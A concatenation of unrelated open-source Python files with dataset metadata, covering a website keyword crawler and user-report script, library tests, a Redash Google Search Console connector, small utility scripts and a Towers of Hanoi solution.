self.__get_uid_by_email(email)\n        if uid is None:\n            return None\n\n        all_profile_domains = []\n\n        if uid not in self.usrelationship.keys():\n            return None\n\n        for site_id, ptype in self.usrelationship[uid]:\n            if ftype == 'detail' and ptype != 0:\n                continue\n\n            if site_id in self.ref_site_status.keys():\n                all_profile_domains += self.ref_site_status[site_id]\n\n        return ','.join(all_profile_domains)\n\n    def __get_uid_by_email(self, email):\n        if email in self.email2uid.keys():\n            return self.email2uid[email]\n        return None\n\n    def get_dd_info(self, email):\n        if email in self.dd.keys():\n            info = self.dd[email]\n            return {\n                'last_month_pv': info['pv_cnt_m_prev'],\n                'last_month_events': info['event_cnt_m_prev'],\n                'heatmap_count': info['hm_page_cnt'],\n                'page_group_count': info['pg_cnt'],\n                'conversion_count': info['cv_cnt'],\n                'login_last_30days': info['login_cnt_30d']\n            }\n\n        return None\n\n    def get_primary_domain(self, site_id):\n        if site_id in self.ref_site_status.keys():\n            return self.ref_site_status[site_id]\n\n        return 'N'\n\n    def get_login_info(self, user_id):\n        login_list = self.__get_login_time_list(user_id)\n        if login_list is None:\n            return 'N', 'N'\n\n        login_list.sort()\n        login_list = [int(one/1000) for one in login_list]\n        new_login_list = list(map(self.__format_login_time, login_list))\n\n        return new_login_list[-1], len(new_login_list)\n\n    def __format_login_time(self, login_time):\n        l_time = time.localtime(login_time)\n        return time.strftime(\"%Y-%m-%d %H:%M:%S\", l_time)\n\n    def __get_login_time_list(self, user_id):\n        if user_id in self.user_login_log.keys():\n            return self.user_login_log[user_id]\n\n        return None\n\n\n@myutil.singleton\nclass ParseSpiderData(object):\n    nltk_pattern = r'''(?x)    # set flag to allow verbose regexps\n        (?:[A-Z]\\.)+            # abbreviations, e.g. U.S.A.\n        |\\d+(?:\\.\\d+)?%?       # numbers, incl. currency and percentages\n        |\\w+(?:[-']\\w+)*        # words w/ optional internal hyphens/apostrophe\n        |\\.\\.\\. 
# ellipsis\n        |(?:[.,;\"'?():-_`]) # special characters with meanings\n    '''\n    prog_list = []\n\n    def __init__(self):\n        for key_word, pattern in SPCE_KW_ARR:\n            prog = re.compile(pattern, flags=re.I)\n            self.prog_list.append((key_word, prog))\n\n        self.parse_spider_dict = {}\n        self.__load_parse()\n        self.parse()\n\n    def parse(self):\n        domain_dirs_path = os.path.join('.', 'data', '*', '*')\n        domain_dirs = glob.glob(domain_dirs_path)\n        for data_path in domain_dirs:\n            \n            basename = os.path.basename(data_path)\n            if self.__is_cache_parse(basename):\n                logging.info('ParseSpiderData cache: %s', data_path)\n                continue\n            \n            logging.info('ParseSpiderData parse: %s', data_path)\n\n            email_suffix = basename\n            homepage = ''\n            sum_kw_counter = Counter({})\n\n            files_path = os.path.join(data_path, '**', '*.json')\n            json_files = glob.glob(files_path, recursive=True)\n            for json_file in json_files:\n                with open(json_file, 'r', encoding='utf-8') as f:\n                    try:\n                        data_json = json.loads(f.read())\n\n                        json_email_suffix = data_json['domain']\n\n                        # take the domain and url from the first page\n                        if data_json['phrase'] == 'first_page':\n                            email_suffix = json_email_suffix\n                            homepage = data_json['url']\n\n                        # skip urls that do not belong to this domain\n                        if self.__is_cache_parse(json_email_suffix):\n                            continue\n\n                        if json_email_suffix not in data_json['url']:\n                            continue\n\n                        _, sum_kw_counter = self.__do_parse(\n                            data_json, sum_kw_counter)\n\n                    except Exception as _e:\n                        continue\n\n            total_kw_hits = 0\n            distinct_kw_hits = 0\n            sum_kw_dict = dict(sum_kw_counter)\n            for key in sum_kw_dict:\n                count = sum_kw_dict[key]\n                total_kw_hits += count\n                distinct_kw_hits += 1\n\n            sum_kw_dict['total_kw_hits'] = total_kw_hits\n            sum_kw_dict['distinct_kw_hits'] = distinct_kw_hits\n\n            if len(email_suffix) > 0:\n                sum_kw_dict['email_suffix'] = email_suffix\n                sum_kw_dict['homepage'] = homepage\n                sum_kw_dict = self.__fill_default_value(sum_kw_dict)\n                self.parse_spider_dict[email_suffix] = sum_kw_dict\n                self.__save_parse(sum_kw_dict)\n\n    def __save_parse(self, sum_kw_dict):\n        save_file = os.path.join('record', 'parse_spider.json')\n        with open(save_file, 'a', newline='', encoding='utf-8') as f:\n            json.dump(sum_kw_dict, f, ensure_ascii=False)\n            f.write(os.linesep)\n\n    def __load_parse(self):\n        save_file = os.path.join('record', 'parse_spider.json')\n        if not os.path.exists(save_file):\n            with open(save_file, 'w', encoding='utf-8') as f:\n                pass\n\n        with open(save_file, 'r', encoding='utf-8') as f:\n            for line in f.readlines():\n                sum_kw_dict = json.loads(line)\n                email_suffix = sum_kw_dict['email_suffix']\n                self.parse_spider_dict[email_suffix] = sum_kw_dict\n\n    def __is_cache_parse(self, email_suffix):\n        if email_suffix in self.parse_spider_dict.keys():\n            return True\n\n        return False\n\n    def __do_parse(self, data_json, counter_summary):\n        counter_detail = Counter({})\n        spec_counter_detail = Counter({})\n        text = data_json['text']\n        soup = bs4.BeautifulSoup(text, 'lxml')\n        tokens = [text.strip().lower() for text in soup.stripped_strings]\n        for item in tokens:\n            if self.__filter_text(item):\n                continue\n\n            # hit check for the special-character keywords\n            spec_hits = self.__get_hits(item)\n            if len(spec_hits) > 0:\n                spec_counter_detail = spec_counter_detail + Counter(spec_hits)\n\n            words = nltk.regexp_tokenize(item, self.nltk_pattern)\n            for word in words:\n                if len(word) < 2:\n                    continue\n\n                hits = self.__check_hit(word)\n                if len(hits) > 0:\n                    counter_hits = Counter(hits)\n                    counter_detail = counter_detail + counter_hits\n                    counter_summary = counter_summary + counter_hits\n\n        return counter_detail + spec_counter_detail, counter_summary + spec_counter_detail\n\n    def 
__get_hits(self, item):\n        hit_dict = {}\n        for (key_word, prog) in self.prog_list:\n            hits = prog.findall(item)\n            if len(hits) > 0:\n                hit_dict[key_word] = len(hits)\n\n        return hit_dict\n\n    def __filter_text(self, text):\n        if len(text) < 2:\n            return True\n\n        # drop comments\n        if text.startswith(r'<!--') and text.endswith(r'-->'):\n            return True\n        # drop comments\n        if text.startswith(r'/*') and text.endswith(r'*/'):\n            return True\n\n        # drop text that starts like html/javascript boilerplate\n        if text.startswith((\n            r'html ', r'function', r'(function', r'$(function'\n        )):\n            return True\n\n        return False\n\n    def __check_hit(self, word):\n        hit_dict = {}\n\n        # do not match pure numbers\n        if word.isnumeric():\n            return hit_dict\n\n        # pure-ASCII words must match a keyword exactly\n        if word.encode('utf-8').isalpha():\n            if word in KW_ARR:\n                hit_dict[word] = 1\n                return hit_dict\n            else:\n                return hit_dict\n\n        # fuzzy (substring) match\n        for key_word in KW_ARR:\n            count = word.count(key_word)\n            if count > 0:\n                hit_dict[key_word] = count\n\n        return hit_dict\n\n    def __fill_default_value(self, info_dict):\n        for key_word in ALL_KW_ARR:\n            if key_word not in info_dict.keys():\n                info_dict[key_word] = 0\n        return info_dict\n\n    def get_info(self, domain):\n        if domain in self.parse_spider_dict.keys():\n            return self.parse_spider_dict[domain]\n\n        return None\n\n\ndef parse_detail():\n    \n    # fix bug: missing homepage\n    domain2url = {}\n    with open(myutil.DETECT_URL, 'r', newline='', encoding='utf-8') as f:\n        reader = csv.DictReader(f)\n        for row in reader:\n            domain2url[row['domain']] = row['url'].strip().rstrip(r'/')\n    # end fix bug\n\n    detail_file = HandleStore().handle_file_name(DETAIL_FILE)\n    HandleStore().write_detail_head(detail_file)\n\n    serial_line = 0\n    user_list = LoadSQLData().get_user_detail()\n    for user_row in user_list:\n        email = user_row['email']\n\n        serial_line += 1\n        logging.info(\n            'parse_data: serial num %d, email %s', serial_line, email\n        )\n\n        domain = myutil.get_domain(email)\n        kw_info = ParseSpiderData().get_info(domain)\n        if kw_info is None:\n            continue\n        \n        # fix bug: missing homepage\n        if len(kw_info['homepage']) == 0:\n            kw_info['homepage'] = domain2url[domain] \n\n        profile_domains = LoadSQLData().get_profile_domains(email)\n        profile_owner = LoadSQLData().is_profile_owner(int(user_row['uid']))\n\n        user_db_info = {\n            'email': email,\n            'company': user_row['account_company_name'],\n            'user_name': user_row['account_name'],\n            'phone': user_row['telephone'],\n            'profile_domains': profile_domains,\n            'profile_owner': profile_owner\n        }\n\n        dd_info = LoadSQLData().get_dd_info(email)\n        if dd_info is None:\n            dd_info = {}\n\n        detail_row = dict(**kw_info, **user_db_info, **dd_info)\n        HandleStore().write_detail_row(detail_file, detail_row)\n\n\ndef parse_summary():\n    summary_row_list = []\n    emails_merge_dict = {}\n\n    detail_file = os.path.join('record', DETAIL_FILE)\n\n    # count emails sharing the same suffix so they can be merged\n    with open(detail_file, 'r', encoding='utf-8-sig') as f:\n        reader = csv.DictReader(f)\n        for detail_row in reader:\n            email_suffix = detail_row['email_suffix']\n            if email_suffix in emails_merge_dict.keys():\n                emails_merge_dict[email_suffix] += 1\n            else:\n                emails_merge_dict[email_suffix] = 1\n\n    merge_email_suffix_list = []\n    with open(detail_file, 'r', encoding='utf-8-sig') as f:\n        reader = csv.DictReader(f)\n        for detail_row in reader:\n            email_suffix = detail_row['email_suffix']\n            if email_suffix in merge_email_suffix_list:\n                continue\n\n            merge_email_suffix_list.append(email_suffix)\n\n            emails_merge_count = 1\n            if email_suffix in emails_merge_dict.keys():\n                emails_merge_count = emails_merge_dict[email_suffix]\n\n            ext_summary = {\n                'email_suffix': email_suffix,\n                
'homepage': detail_row['homepage'],\n                'email_count': emails_merge_count,\n                'company': detail_row['company'],\n                'last_month_pv': detail_row['last_month_pv'],\n                'last_month_events': detail_row['last_month_events'],\n                'heatmap_count': detail_row['heatmap_count'],\n                'page_group_count': detail_row['page_group_count'],\n                'conversion_count': detail_row['conversion_count'],\n                'login_last_30days': detail_row['login_last_30days'],\n                'total_kw_hits': detail_row['total_kw_hits'],\n                'distinct_kw_hits': detail_row['distinct_kw_hits']\n            }\n            kw_summary = {}\n            for kw in ALL_KW_ARR:\n                kw_summary[kw] = detail_row[kw]\n\n            summary_row = dict(**ext_summary, **kw_summary)\n            summary_row_list.append(summary_row)\n\n    summary_file = HandleStore().handle_file_name(SUMMARY_FILE)\n    HandleStore().write_summary_head(summary_file)\n    for summary_row in summary_row_list:\n        HandleStore().write_summary_row(summary_file, summary_row)\n\n\ndef help():\n    print('%s [--fetch | --detail | --summary]' % sys.argv[0])\n\n\nsys.excepthook = my_excepthook\n\nif __name__ == '__main__':\n\n    # initialize the logging configuration\n    init_log_config()\n    logging.info(\"=================================================\")\n\n    try:\n        cmd = '--fetch'\n        if len(sys.argv) > 1:\n            cmd = sys.argv[1]\n\n        if cmd == '--fetch':\n            # fetch web pages and store them on local disk\n            spider_data()\n        elif cmd == '--detail':\n            # parse the details of every site into the corresponding csv file\n            parse_detail()\n        elif cmd == '--summary':\n            # aggregate all site information into a summary\n            parse_summary()\n        else:\n            # print usage information\n            help()\n\n        # opts, _args = getopt.getopt(\n        #     sys.argv[1:],\n        #     \"h\",\n        #     [\"help\", \"fetch\", \"parse\", \"summary\"]\n        # )\n\n        # if len(opts) == 0:\n        #     help()\n        #     raise ArgsException('no args')\n\n        # for opt, arg in opts:\n        #     if opt in ('-h', '--help'):\n        #         # print usage information\n        #         help()\n        #     elif opt == '--fetch':\n        #         # fetch web pages and store them on local disk\n        #         parse_email()\n        #     elif opt == '--parse':\n        #         # parse the details of every site into the corresponding csv file\n        #         parse_data()\n        #     elif opt == '--summary':\n        #         # aggregate all site information into a summary\n        #         collect_summary()\n\n    except getopt.GetoptError as e:\n        logging.error(e)\n\n    except Exception as e:\n        logging.exception('exception happened')\n\n    finally:\n        logging.info(\"run over !!! 
~~~~~~~~~~~~~~~~~~~~~\")\n","repo_name":"lyx003288/python","sub_path":"0004.web_parse/tutorial/parse_register.py","file_name":"parse_register.py","file_ext":"py","file_size_in_byte":24709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15185318758","text":"import pytest\n\nfrom pyecoforest.exceptions import EcoforestError\nfrom pyecoforest.models.device import Alarm, Device, OperationMode, State\n\n\ndef get_api_data():\n return {\n \"status\": {\n \"on_off\": \"0\",\n \"estado\": \"0\",\n \"consigna_potencia\": \"6\",\n \"consigna_temperatura\": \"22\",\n \"temperatura\": \"24.5\",\n \"modo_operacion\": \"0\",\n },\n \"stats\": {\n \"Me\": \"model-version\",\n \"Vs\": \"firmware-version\",\n \"Ns\": \"serial-number\",\n \"Tp\": \"33.5\",\n \"Th\": \"36.5\",\n \"Tn\": \"23.5\",\n \"Da\": \"002\",\n \"Nh\": \"000006826\",\n \"Ne\": \"001152\",\n \"Pn\": \"0.0\",\n \"Pf\": \"0.0\",\n \"Es\": \"0\",\n \"Ex\": \"0.0\",\n \"Ni\": \"0\",\n \"Co\": \"0.0\",\n },\n \"alarms\": {\"get_alarmas\": \"A099\"},\n }\n\n\ndef test_operation_mode_build():\n assert OperationMode.build(\"0\") == OperationMode.POWER\n assert OperationMode.build(\"1\") == OperationMode.TEMPERATURE\n assert OperationMode.build(\"2\") == OperationMode.EMERGENCY\n with pytest.raises(EcoforestError) as error:\n OperationMode.build(\"3\")\n assert str(error.value) == \"The operation mode 3 is not a valid operation!\"\n\n\ndef test_state_build():\n assert State.build(\"0\") == State.OFF\n for i in [*range(1, 5), 10]:\n assert State.build(i) == State.STARTING\n for i in range(5, 7):\n assert State.build(i) == State.PRE_HEATING\n assert State.build(\"7\") == State.ON\n for i in [8, 11, -3]:\n assert State.build(i) == State.SHUTTING_DOWN\n assert State.build(\"-20\") == State.STAND_BY\n assert State.build(\"-4\") == State.ALARM\n with pytest.raises(EcoforestError) as error:\n State.build(\"9\")\n assert str(error.value) == \"The state 9 is not a valid state!\"\n\n\ndef test_alarm_build():\n for i in [\"A001\", \"A002\"]:\n assert Alarm.build(i) == Alarm.AIR_DEPRESSION\n assert Alarm.build(\"A012\") == Alarm.CPU_OVERHEATING\n assert Alarm.build(\"A099\") == Alarm.PELLETS\n assert Alarm.build(\"N\") is None\n assert Alarm.build(\"A100\") == Alarm.UNKNOWN\n\n\ndef test_device_build():\n assert Device.build(get_api_data()) == Device(\n is_supported=False,\n model=\"model-version\",\n model_name=\"Cordoba glass\",\n firmware=\"firmware-version\",\n serial_number=\"serial-number\",\n operation_mode=OperationMode.POWER,\n on=False,\n state=State.OFF,\n power=6,\n temperature=22,\n alarm=Alarm.PELLETS,\n alarm_code=\"A099\",\n environment_temperature=24.5,\n cpu_temperature=33.5,\n gas_temperature=36.5,\n ntc_temperature=23.5,\n depression=2,\n working_hours=6826,\n ignitions=1152,\n live_pulse=0.0,\n pulse_offset=0.0,\n working_state=0,\n extractor=0,\n working_level=0,\n convecto_air_flow=0.0,\n )\n\n\ndef test_device_build_with_supportted_device():\n data = get_api_data()\n data[\"stats\"][\"Me\"] = \"CC2014_v2\"\n assert Device.build(data).is_supported is True\n","repo_name":"pjanuario/pyecoforest","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39090848418","text":"import spi\nimport numpy as np\n\n\ndef test_gamma_out():\n\n SPI = spi.SPI()\n rainfall_data = np.genfromtxt('data/rainfall_test2.csv', 
delimiter=',')\n    SPI.set_rolling_window_params(span=10, window_type='boxcar', center=False)\n    SPI.set_distribution_params(dist_type='gam')\n    result = SPI.calculate(rainfall_data, starting_month=1)\n    assert np.round(result[-1][0], 4) == np.round(-0.09562831, 4)\n\ntest_gamma_out()\n","repo_name":"anind99/SPI-CALC","sub_path":"test_spi.py","file_name":"test_spi.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"1218723220","text":"\"\"\"\nThis module provides the definitions used for type hints.\n\"\"\"\n\nfrom typing import TYPE_CHECKING, Union, Dict, Any, List\n\nif TYPE_CHECKING:\n    from .message import Message, MessageSegment\n\n__all__ = [\n    'Message_T',\n]\n\nMessage_T = Union[str, Dict[str, Any], List[Dict[str, Any]], 'MessageSegment',\n                  'Message']\n","repo_name":"nonebot/aiocqhttp","sub_path":"aiocqhttp/typing.py","file_name":"typing.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"94"}
{"seq_id":"74114277109","text":"#!/usr/bin/env python3\n\nfrom time import sleep\nfrom random import choice, randint\n\nfrom ev3dev.auto import *\n\nimport time\n\nmuxC2port = LegoPort(\"in1:i2c81:mux2\")\nmuxC2port.set_device = \"lego-ev3-color\"\nsleep(1) # need to wait for sensors to be loaded. 0.5 seconds is not enough.\n\ncs = ColorSensor(\"in1:i2c81:mux2\");\t\tassert cs.connected\n\ncs.mode = 'COL-REFLECT'\n\n\nprint(\"Started\")\n\nmeanValue = cs.value()\n\nwhile True:\n    meanValue = (meanValue+cs.value())/2\n    print(meanValue)\n    print('\\n')\n    print(cs.value())\n    sleep(1)\n","repo_name":"AlexandreLin888/Isep_cruise_control","sub_path":"sensorTest.py","file_name":"sensorTest.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"}
{"seq_id":"42129717206","text":"import pandas as pd\nfrom bokeh.plotting import figure\nfrom bokeh.transform import linear_cmap\n\ndf = pd.read_csv(\"data/movies.csv\", parse_dates=[\"Release Date\"])\ndf[\"Release Date\"] = df[\"Release Date\"].dt.year\ndf2 = df.groupby(\"Release Date\")[\"Worldwide Gross\"].sum().reset_index()\n\ndf2[\"y\"] = 1\n\np = figure()\n\np.vbar(\n    x=\"Release Date\",\n    top=\"y\",\n    width=0.5,\n    color=linear_cmap(\n        \"Worldwide Gross\",\n        \"Viridis256\",\n        df2[\"Worldwide Gross\"].min(),\n        df2[\"Worldwide Gross\"].max(),\n    ),\n    source=df2,\n)\n","repo_name":"notascope/notascope","sub_path":"galleries/movies/bokeh/stripes.py","file_name":"stripes.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"}
{"seq_id":"72647864949","text":"import logging\nfrom base64 import b64decode\nfrom datetime import datetime\n\nfrom redash.query_runner import (\n    TYPE_DATE,\n    TYPE_DATETIME,\n    TYPE_FLOAT,\n    TYPE_INTEGER,\n    TYPE_STRING,\n    BaseSQLQueryRunner,\n    register,\n)\nfrom redash.utils import json_dumps, json_loads\n\nlogger = logging.getLogger(__name__)\n\ntry:\n    import google.auth\n    from apiclient.discovery import build\n    from apiclient.errors import HttpError\n    from google.oauth2.service_account import Credentials\n\n    enabled = True\nexcept ImportError:\n    enabled = False\n\n\ntypes_conv = dict(\n    STRING=TYPE_STRING,\n    INTEGER=TYPE_INTEGER,\n    FLOAT=TYPE_FLOAT,\n    DATE=TYPE_DATE,\n    DATETIME=TYPE_DATETIME,\n)\n\n\ndef parse_ga_response(response, dimensions):\n    columns = []\n\n    for item in dimensions:\n        if item == \"date\":\n            data_type = 
\"date\"\n else:\n data_type = \"string\"\n columns.append(\n {\n \"name\": item,\n \"friendly_name\": item,\n \"type\": data_type,\n }\n )\n\n default_items = [\"clicks\", \"impressions\", \"ctr\", \"position\"]\n for item in default_items:\n columns.append({\"name\": item, \"friendly_name\": item, \"type\": \"number\"})\n\n rows = []\n for r in response.get(\"rows\", []):\n d = {}\n for k, value in r.items():\n if k == \"keys\":\n for index, val in enumerate(value):\n column_name = columns[index][\"name\"]\n column_type = columns[index][\"type\"]\n val = get_formatted_value(column_type, val)\n d[column_name] = val\n else:\n column_name = k\n column_type = [col for col in columns if col[\"name\"] == column_name][0][\"type\"]\n value = get_formatted_value(column_type, value)\n d[column_name] = value\n rows.append(d)\n\n return {\"columns\": columns, \"rows\": rows}\n\n\ndef get_formatted_value(column_type, value):\n if column_type == \"number\":\n value = round(value, 2)\n elif column_type == TYPE_DATE:\n value = datetime.strptime(value, \"%Y-%m-%d\")\n elif column_type == TYPE_DATETIME:\n if len(value) == 10:\n value = datetime.strptime(value, \"%Y%m%d%H\")\n elif len(value) == 12:\n value = datetime.strptime(value, \"%Y%m%d%H%M\")\n else:\n raise Exception(\"Unknown date/time format in results: '{}'\".format(value))\n return value\n\n\nclass GoogleSearchConsole(BaseSQLQueryRunner):\n should_annotate_query = False\n\n @classmethod\n def type(cls):\n return \"google_search_console\"\n\n @classmethod\n def name(cls):\n return \"Google Search Console\"\n\n @classmethod\n def enabled(cls):\n return enabled\n\n @classmethod\n def configuration_schema(cls):\n return {\n \"type\": \"object\",\n \"properties\": {\n \"siteURL\": {\"type\": \"string\", \"title\": \"Site URL\"},\n \"jsonKeyFile\": {\"type\": \"string\", \"title\": \"JSON Key File (ADC is used if omitted)\"},\n },\n \"required\": [],\n \"secret\": [\"jsonKeyFile\"],\n }\n\n def __init__(self, configuration):\n super(GoogleSearchConsole, self).__init__(configuration)\n self.syntax = \"json\"\n\n def _get_search_service(self):\n scopes = [\"https://www.googleapis.com/auth/webmasters.readonly\"]\n\n try:\n key = json_loads(b64decode(self.configuration[\"jsonKeyFile\"]))\n creds = Credentials.from_service_account_info(key, scopes=scopes)\n except KeyError:\n creds = google.auth.default(scopes=scopes)[0]\n\n return build(\"searchconsole\", \"v1\", credentials=creds)\n\n def test_connection(self):\n try:\n service = self._get_search_service()\n service.sites().list().execute()\n except HttpError as e:\n # Make sure we return a more readable error to the end user\n raise Exception(e._get_reason())\n\n def run_query(self, query, user):\n logger.debug(\"Search Analytics is about to execute query: %s\", query)\n params = json_loads(query)\n site_url = self.configuration[\"siteURL\"]\n api = self._get_search_service()\n\n if len(params) > 0:\n try:\n response = api.searchanalytics().query(siteUrl=site_url, body=params).execute()\n data = parse_ga_response(response, params[\"dimensions\"])\n error = None\n json_data = json_dumps(data)\n except HttpError as e:\n # Make sure we return a more readable error to the end user\n error = e._get_reason()\n json_data = None\n else:\n error = \"Wrong query format.\"\n json_data = None\n return json_data, 
error\n\n\nregister(GoogleSearchConsole)\n","repo_name":"getredash/redash","sub_path":"redash/query_runner/google_search_console.py","file_name":"google_search_console.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","stars":24135,"dataset":"github-code","pt":"94"}
{"seq_id":"40146442212","text":"# Daniel Makarov\n# Investment Calculator\n# Date: October 25 2021\n\nwhile True:\n    try:\n        principal = float(input(\"Enter initial amount: \"))\n        #print(\"Initial Amount:\", principal)\n        break\n    except:\n        print(\"Something seems wrong with your initial amount. Please try again\")\n\nwhile True:\n    try:\n        interest_rate = float(input(\"Enter interest rate: \"))\n        #print(\"Interest rate:\", interest_rate)\n        break\n    except:\n        print(\"Something seems wrong with your input. Please try again\")\n\nwhile True:\n    try:\n        years = int(input(\"Please input the number of years: \"))\n        #print(\"Input number of years:\", years)\n        break\n    except:\n        print(\"Something seems wrong with your input of years. Please try again\")\n\nyears += 1\n\n\n# Outputs a table for the compound interest over a set of years\nfor number_of_years in range(1, years):\n    principal = principal * (1 + interest_rate)\n    #print(\"Number:\", number_of_years, \"Total:\", principal)\n\n    # Rounds amount to 2 decimals\n    principal_number = \"{:.2f}\".format(principal)\n    print(number_of_years, principal_number)","repo_name":"daniel-makarov/Grade-12-Python","sub_path":"L2_Div_II/Investment_Calculator.py","file_name":"Investment_Calculator.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
{"seq_id":"18660002515","text":"# -*- coding: utf-8 -*-\n\n\nimport datetime\nfrom decimal import Decimal\n\nimport times\nfrom icalendar import Calendar\n\nfrom .html import html  # NOQA\n\n\ndef ical(text):\n    \"\"\"Takes text and returns iCalendar data structure.\"\"\"\n    return Calendar.from_ical(text)\n\n\ndef price(value):\n    \"\"\"Decimal number factory with some initial value polishing.\"\"\"\n    value = unicode(value)\n    value = value.replace(',', '.')\n    value = value.replace(u'Kč', '')\n    return Decimal(value.strip())\n\n\ndef date_time_year(date, time, year=None, tz='Europe/Prague'):\n    \"\"\"Parses strings representing parts of datetime and combines them\n    together. Resulting datetime is in UTC.\n    \"\"\"\n    dt_string = u'{date} {time} {year}'.format(\n        date=date,\n        time=time,\n        year=year or times.now().year,\n    )\n    possible_formats = (\n        '%d. %m. %H:%M %Y',\n        '%d. %m. %H.%M %Y',\n    )\n    dt = None\n    for format in possible_formats:\n        try:\n            dt = datetime.datetime.strptime(dt_string, format)\n        except ValueError:\n            pass\n        else:\n            break\n    if dt:\n        return times.to_universal(dt, tz)\n    else:\n        raise ValueError(dt_string)\n","repo_name":"volmutJ/zitkino.cz","sub_path":"zitkino/parsers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"}
{"seq_id":"21457513878","text":"import functools\nfrom typing import List\n\nfrom test_framework import generic_test\nfrom test_framework.test_failure import TestFailure\nfrom test_framework.test_utils import enable_executor_hook\n\n\"\"\"\nhttps://www.mathsisfun.com/games/towerofhanoi.html\nThe only way to solve the puzzle is to build interim towers on the different pegs.\nYou start at the bottom, not the top! Here's how it works. 
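(For a quick sanity check, n = 2 takes 2^2 - 1 = 3 moves: small disk A->B, large disk A->C, small disk B->C.) 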
If all the disks are on Peg A at the left, and you need to move them all to Peg C on the right, then you need to move the bottom disk, the largest one, to Peg C. Obviously.\nThe only way you can release the nth disk is by building an n-1 disk tower on the empty area.\n\nTo do that, you need to build an interim tower on Peg B with the next largest disk at the bottom. And to do that, you need to build an interim tower on Peg C with the next largest disk.\n\nAwesome explanation here: https://www.youtube.com/watch?v=boS4N1_TLBk&ab_channel=FlorianLudewig\nTowers of Hanoi: In the classic problem of the Towers of Hanoi, you have 3 towers and N disks of different sizes which can slide onto any tower. The puzzle starts with disks sorted in ascending order of size from top to bottom (i.e., each disk sits on top of an even larger one).\nTime: O(2^n)\n\nAnother https://blog.tjd.phlegethon.org/post/107154349862/technical-interviews-and-the-towers-of-hanoi\nThe largest disk moves exactly once, to the left (wrapping around). The second-largest disk moves twice, both times to the right, which matches the algorithm: it moves right to allow the largest disk to move left, and then right again to land on top of it. The third-largest disk moves four times, to the left each time, and the pattern continues for bigger towers. So we know two things: each disk has a preferred direction, and the full solution for N disks has (1 + 2 + ... + 2^(N-1)) == (2^N) - 1 total moves. The iterative algorithm looks like this:\n\ndefine hanoi(N):\n    repeat 2^N - 1 times:\n        move the largest disk that can go in its preferred direction\n\nYou have the following constraints:\n\n(1) Only one disk can be moved at a time.\n(2) A disk is slid off the top of one tower onto another tower.\n(3) A disk cannot be placed on top of a smaller disk. Write a program to move the disks from the first tower to the last using Stacks.\n\nThe pattern here is:\n - Shift 'n-1' disks from 'origin' to 'buffer', using destination.\n - Shift last disk from 'origin' to 'destination'.\n - Shift 'n-1' disks from 'buffer' to 'destination', using origin.\n\nmoveDisks(int n, Tower origin, Tower destination, Tower buffer) { //places fixed remember\n\n/* Base case */\nif (n <= 0) return;\n\n/* move top n - 1 disks from origin to buffer, using destination as a buffer. */\nmoveDisks(n - 1, origin, buffer, destination);\n\n/* move top from origin to destination */\nmoveTop(origin, destination);\n\n/* move top n - 1 disks from buffer to destination, using origin as a buffer. 
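For a concrete trace of this pattern (a worked illustration derived from the recursion above, not part of the original text): with n = 2 and pegs numbered 0, 1, 2, the calls emit the moves (0 -> 1), (0 -> 2), (1 -> 2) -- the small disk goes to the buffer, the large disk to the destination, and the small disk lands on top -- which is indeed 2^2 - 1 = 3 moves in total. 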
*/\n\nmoveDisks(n - 1, buffer, destination, origin);\n}\n\"\"\"\n\nNUM_PEGS = 3 #number of towers\n#ring means those individual disks\n\ndef compute_tower_hanoi(num_rings: int) -> List[List[int]]:\n def compute_tower_hanoi_steps(num_rings_to_move, from_peg, to_peg,\n use_peg):# origin, destination, buffer\n if num_rings_to_move > 0:\n compute_tower_hanoi_steps(num_rings_to_move - 1, from_peg, use_peg,\n to_peg)#move n - 1 disk to buffer using destination \n #this the disk leaving 'from' tower get added to 'destination' tower\n # pegs[to_peg].append(pegs[from_peg].pop())\n result.append([from_peg, to_peg])\n compute_tower_hanoi_steps(num_rings_to_move - 1, use_peg, to_peg,\n from_peg)# move 'n-1' disks from 'buffer' to 'destination', using origin\n\n # Initialize pegs.\n result: List[List[int]] = []\n #initializing towers\n # pegs = [list(reversed(range(1, num_rings + 1)))\n # ] + [[] for _ in range(1, NUM_PEGS)]\n #same as above\n # pegs = [list(reversed(range(1, num_rings + 1)))] + [[] for _ in range(NUM_PEGS - 1)] \n # print(pegs)\n compute_tower_hanoi_steps(num_rings, 0, 2, 1) #i changed the destination to 3 (index 2), earlier it was middle (2)\n return result\n\n# compute_tower_hanoi(3)\n\n#more simple version\n# https://www.youtube.com/watch?v=rf6uf3jNjbo&ab_channel=Reducible\ndef compute_tower_hanyoi(num_rings: int) -> List[List[int]]:\n def hanoi(n, start, end):\n if n == 1:#lets imagine if there is only one, you move it directly to destination\n result.append([start, end])\n else:\n #using 3 here, since 0 + 1 + 2 = 3, video shows 6 , since 1 + 2 + 3\n other = 3 - (start + end)#method of finding the auxiliary/buffer rod at any given time in the recursion\n #above formula find which rod is available for next free legal move\n hanoi(n - 1, start, other)#first move to buffer, you can imagine this step for total disk ==2\n result.append([start, end])#move\n hanoi( n - 1, other, end)\n result: List[List[int]] = []\n hanoi(num_rings, 0, 2)\n return result\ncompute_tower_hanoi(2)\n\n\n\n\n@enable_executor_hook\ndef compute_tower_hanoi_wrapper(executor, num_rings):\n pegs = [list(reversed(range(1, num_rings + 1)))\n ] + [[] for _ in range(1, NUM_PEGS)]\n\n result = executor.run(functools.partial(compute_tower_hanoi, num_rings))\n\n for from_peg, to_peg in result:\n if pegs[to_peg] and pegs[from_peg][-1] >= pegs[to_peg][-1]:\n raise TestFailure('Illegal move from {} to {}'.format(\n pegs[from_peg][-1], 